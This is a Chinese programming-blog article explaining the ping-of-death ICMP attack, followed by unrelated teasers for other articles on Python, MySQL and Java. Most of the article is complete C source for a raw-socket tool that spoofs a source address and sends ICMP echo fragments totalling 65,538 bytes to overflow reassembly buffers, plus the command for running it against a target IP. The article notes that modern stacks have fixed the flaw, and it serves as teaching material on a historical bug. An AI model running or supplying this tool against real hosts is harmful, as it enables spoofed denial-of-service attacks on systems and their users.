icmp攻击类型ping-of-death

2023-12-19 09:32
文章标签 类型 icmp 攻击 ping death

本文主要是介绍icmp攻击类型ping-of-death,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

某些协议栈对于分片报文,事先分配最大IP长度65536字节的缓冲区,而实际接收到的分片在重组时,超过65536的长度将导致缓冲区溢出错误。当前的各个协议栈实现早已修复此问题。

以下程序用于发送超过65536的IP分片报文,首先是头文件部分:

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

其次是初始化初始RAW套接口,以及参数:

int main(int argc, char **argv)
{int s;char buf[1500];const int buflen = 1500;struct ip *ip = (struct ip *)buf;struct icmp *icmp = (struct icmp *)(ip + 1);struct sockaddr_in dst;int offset;int on = 1;if (argc != 3) {fprintf(stderr, "usage: %s source hostname\n", argv[0]);exit(1);}bzero(buf, buflen);if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {perror("socket");exit(1);}if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {perror("IP_HDRINCL");exit(1);}if ((ip->ip_src.s_addr = inet_addr(argv[1])) == -1) {fprintf(stderr, "%s: unknown src address\n", argv[1]);exit(1);}if ((ip->ip_dst.s_addr = inet_addr(argv[2])) == -1) {fprintf(stderr, "%s: unknown dst address\n", argv[2]);exit(1);}printf("Sending to %s", inet_ntoa(ip->ip_dst));printf(" from %s\n", inet_ntoa(ip->ip_src));

初始化IP头部字段,和ICMP信息,类型为(ICMP_ECHO)8,code为0,即ECHO Request(ping)报文:

        ip->ip_v = 4;ip->ip_hl = sizeof *ip >> 2;ip->ip_tos = 0;ip->ip_len = htons(buflen);ip->ip_id = htons(5271);ip->ip_off = htons(0);ip->ip_ttl = 255;ip->ip_p = IPPROTO_ICMP;ip->ip_sum = 0; /* set by protocol stack */dst.sin_addr = ip->ip_dst;dst.sin_family = AF_INET;icmp->icmp_type = ICMP_ECHO;icmp->icmp_code = 0;icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

最后,发送44个1480字节的分片,共65120字节,第45个分片长度为418字节,总共是65538字节,超过65536的最大长度:

        for (offset = 0; offset < 65536; offset += (buflen - sizeof *ip)/*1480*/) {int slen = buflen;ip->ip_off = htons(offset >> 3); /* divide by 8. */if (offset < 65120/* 1480*44 */) {ip->ip_off |= htons(IP_MF);} else {ip->ip_len = htons(418); /* make total 65538 */slen = 418;}if (sendto(s, buf, slen, 0, (struct sockaddr *)&dst,sizeof dst) < 0) {fprintf(stderr, "offset %d: errno %d", offset, errno);}if (offset == 0)memset(icmp, 0, sizeof(struct icmp));}return 0;
}

编译完成之后,如下调用,需要输入源IP地址,和要攻击的目标IP地址:

$ ./a.out 
usage: ./a.out source hostname
$ 
$ sudo ./a.out 192.168.1.124 192.168.1.109

windows系统在将回复参数错误的ICMP报文,如下图:

在这里插入图片描述

这篇关于icmp攻击类型ping-of-death的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/511695

相关文章

Python中Json和其他类型相互转换的实现示例

《Python中Json和其他类型相互转换的实现示例》本文介绍了在Python中使用json模块实现json数据与dict、object之间的高效转换,包括loads(),load(),dumps()... 项目中经常会用到json格式转为object对象、dict字典格式等。在此做个记录,方便后续用到该方

python中的显式声明类型参数使用方式

《python中的显式声明类型参数使用方式》文章探讨了Python3.10+版本中类型注解的使用,指出FastAPI官方示例强调显式声明参数类型,通过|操作符替代Union/Optional,可提升代... 目录背景python函数显式声明的类型汇总基本类型集合类型Optional and Union(py

MySQL中查询和展示LONGBLOB类型数据的技巧总结

《MySQL中查询和展示LONGBLOB类型数据的技巧总结》在MySQL中LONGBLOB是一种二进制大对象(BLOB)数据类型,用于存储大量的二进制数据,:本文主要介绍MySQL中查询和展示LO... 目录前言1. 查询 LONGBLOB 数据的大小2. 查询并展示 LONGBLOB 数据2.1 转换为十

MyBatis的xml中字符串类型判空与非字符串类型判空处理方式(最新整理)

《MyBatis的xml中字符串类型判空与非字符串类型判空处理方式(最新整理)》本文给大家介绍MyBatis的xml中字符串类型判空与非字符串类型判空处理方式,本文给大家介绍的非常详细,对大家的学习或... 目录完整 Hutool 写法版本对比优化为什么status变成Long?为什么 price 没事?怎

C#之枚举类型与随机数详解

《C#之枚举类型与随机数详解》文章讲解了枚举类型的定义与使用方法,包括在main外部声明枚举,用于表示游戏状态和周几状态,枚举值默认从0开始递增,也可手动设置初始值以生成随机数... 目录枚举类型1.定义枚举类型(main外)2.使用生成随机数总结枚举类型1.定义枚举类型(main外)enum 类型名字

Python lambda函数(匿名函数)、参数类型与递归全解析

《Pythonlambda函数(匿名函数)、参数类型与递归全解析》本文详解Python中lambda匿名函数、灵活参数类型和递归函数三大进阶特性,分别介绍其定义、应用场景及注意事项,助力编写简洁高效... 目录一、lambda 匿名函数:简洁的单行函数1. lambda 的定义与基本用法2. lambda

C语言自定义类型之联合和枚举解读

《C语言自定义类型之联合和枚举解读》联合体共享内存,大小由最大成员决定,遵循对齐规则;枚举类型列举可能值,提升可读性和类型安全性,两者在C语言中用于优化内存和程序效率... 目录一、联合体1.1 联合体类型的声明1.2 联合体的特点1.2.1 特点11.2.2 特点21.2.3 特点31.3 联合体的大小1

MySQL 索引简介及常见的索引类型有哪些

《MySQL索引简介及常见的索引类型有哪些》MySQL索引是加速数据检索的特殊结构,用于存储列值与位置信息,常见的索引类型包括:主键索引、唯一索引、普通索引、复合索引、全文索引和空间索引等,本文介绍... 目录什么是 mysql 的索引?常见的索引类型有哪些?总结性回答详细解释1. MySQL 索引的概念2

Java获取当前时间String类型和Date类型方式

《Java获取当前时间String类型和Date类型方式》:本文主要介绍Java获取当前时间String类型和Date类型方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,... 目录Java获取当前时间String和Date类型String类型和Date类型输出结果总结Java获取

SpringBoot改造MCP服务器的详细说明(StreamableHTTP 类型)

《SpringBoot改造MCP服务器的详细说明(StreamableHTTP类型)》本文介绍了SpringBoot如何实现MCPStreamableHTTP服务器,并且使用CherryStudio... 目录SpringBoot改造MCP服务器(StreamableHTTP)1 项目说明2 使用说明2.1